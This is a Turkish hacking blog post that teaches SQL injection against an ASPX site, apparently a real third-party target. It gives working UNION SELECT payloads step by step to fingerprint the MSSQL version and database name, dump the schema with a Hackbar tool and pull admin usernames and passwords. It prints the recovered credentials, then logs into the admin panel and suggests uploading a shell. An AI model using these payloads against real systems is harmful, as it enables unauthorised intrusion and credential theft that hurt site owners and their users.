• En yeniler

    ASPX Sql İnjection

     Bu Konuda ASPX Siteye üzerinde Sql İnjection İşlemi yapmayı öğreneceğiz.

    Öncelikle Sql Açıklı aspx sitemizi açtık;


    Tek Tırnak Atalım Bakalım Hata Alacakmıyız ?
    Evet hata aldık.
    Kolon Sayısı bulmaya geçelim.


    order by 8-- - Dedik Sayfa yine aynı;


    order by 9-- - diyelim bakalım değişim olacak mı ?
    The ORDER BY position number 9 is out of range of the number of items in the select list. 9‘da bu hatayı aldık Bu hatayı aldık demek ki kolon sayımız 9‘dan az.
    Her zaman hata aldığımız sayıdan önceki sayı kolon sayısıdır. Örnek:Biz 9‘da hata aldık kolon sayımız 8



    +UNION+ALL+SELECT+1,2,3,4,5,6,7,8-- -
    Evet iyi gidiyor bulunduğumuz sayfadaki fotoğrafın adıyla ilgili birşey çıktı.
    bu iyiye gittiğine işaret.



    Version öğrenmek istiyorum.
    +UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8-- - dedim
    Olumsuz sonuç aldım;


    null ile deniyelim.
    Hackbar gt;Union Statement gt;NULL,NULL Seçeneğini seçtik.
    bizden sayı isteyecek kolon sayımız olan 8‘i gireceğiz.
    oluşturduğu url‘den olumlu sonuç çıkmayabilir null‘ları sırayla tek tek silerek deneyebilirsiniz.
    UNION+ALL+SELECT+@@version,null,null,null,null,null,null,null--+- dedim.
    Versiyon bilgisi bizde;
    Conversion failed when converting the nvarchar value ‘Microsoft SQL Server 2012 - 11.0.5058.0 (X64)
    May 14 2014 18:34:29
    Copyright (c) Microsoft Corporation
    Express Edition (64-bit) on Windows NT 6.3 lt;X64 gt; (Build 9600: ) (Hypervisor)
    ‘ to data type int.


    Sıra Geldi Database Adı Almaya;
    +UNION+ALL+SELECT+db_name(),null,null,null,null,null,null,null--+- dedik.
    ve Database adımızı aldık. 
    Database Adı;
    clienthostin_Dixon


    En karışık gibi görünen ama basit bir kısıma geldik
    Union Based Seçeneğini Seçtik ve Dios Mssql dedik.
    Dedikten sonra url sonuna uzunca bir kod ekledi
    urlde küçük bir değişiklik yapacağız.
    url sonundaki output into Chall1 END-- ‘i output into cw1 END-- - olarak değiştireceğiz.
    ve üstteki ‘injected by rummykhan metnini injected by cw1 olarak değiştireceğiz.
    ve komutu gireceğiz karşımıza kayda değer birşey çıkmayacak çünkü bu girdiğimiz komutun karşılığını diğer gireceğimiz komutta alacağız.



    Kolonları ve içerikleri önümüze dökelim;
    +UNION+ALL+SELECT+output,null,null,null,null,null,null,null from cw1 --+- dedik.
    ve sonuç;
    Tablo adları ve kolonları kolon adları vs gözüküyor.
    Bizim işimize yarayacak olan Tablo‘nun adı adminuser kolonları da username ve passwords.




    Evet İnjection İşlemimizdeki Son Aşamaya geldik.
    UNION+ALL+SELECT+concat(username,0x3a,passwords),null,null,null,null,null,null,null from adminuser--+- dedik ve Admin bilgileri karşımızda.

    Username:admin
    Password:admins


    Şimdi Panele girmeyi deneyelim;


    Ve Paneldeyiz Artık İstediğimizi yapabiliriz ister shell vs atabiliriz.






    Bu yazıyı sitenizde/forumunuzda paylaşmak için aşağıdaki linkleri kullanabilirsiniz..




    Scorpiol


    Hiç yorum yok

    Post Bottom Ad

    Sayfamıza Hoş Geldiniz Takipte Kalınız... Scorpiol Kimdir?

    X
    Oxygen Chrome